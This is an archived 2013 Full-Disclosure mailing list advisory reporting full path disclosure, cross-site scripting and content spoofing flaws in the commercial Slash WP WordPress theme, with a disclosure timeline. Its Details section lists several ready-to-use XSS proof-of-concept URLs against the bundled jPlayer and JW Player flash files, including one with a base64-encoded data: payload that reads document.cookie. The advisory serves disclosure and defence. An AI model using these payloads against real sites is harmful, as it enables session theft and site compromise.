lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <008701ce6de9$d7effd40$9b7a6fd5@pc>
Date: Thu, 20 Jun 2013 22:10:16 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: FPD,
	XSS and CS vulnerabilities in Slash WP theme for WordPress

Hello list!

I want to warn you about multiple vulnerabilities in Slash WP theme for 
WordPress. This is commercial theme for WP.

These are Full path disclosure, Cross-Site Scripting and Content Spoofing 
vulnerabilities.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Slash WP theme for WordPress. After I've 
informed developers about these vulnerabilities in April, they just thanked 
and promised to look at these vulnerabilities. There are no information if 
they fixed these holes already or when they are planning to do it. So all 
users of the theme should contact the developers for updates.

-------------------------
Affected vendors:
-------------------------

Dream-Theme
http://dream-theme.com

----------
Details:
----------

Full path disclosure (WASC-13):

http://site/wp-content/themes/slash-wp/

FPD in index.php and other php-files in plugin's folder and subfolders.

Cross-Site Scripting (WASC-08):

In the theme there are jPlayer 2.1.0 and JW Player 5.8.2011, about 
vulnerabilities in which I wrote earlier (in 2012 and 2013).

http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie)

http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

There is flash file of JW Player at some sites with this theme, but not at 
others. According to theme's description, theme has built-in support of JW 
Player, but it's not included in standard bundle (only jPlayer). But it can 
be installed separately and some web sites owners do it.

Content Spoofing (WASC-12):

About Content Spoofing vulnerabilities and about other XSS vulnerabilities 
in JW Player (http://securityvulns.com/docs28176.html) and in jPlayer 
(http://securityvulns.com/docs29316.html), you can read in corresponding 
advisories.

------------
Timeline:
------------ 

2013.04.11 - announced at my site.
2013.04.12 - informed developers.
2013.06.20 - disclosed at my site (http://websecurity.com.ua/6440/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ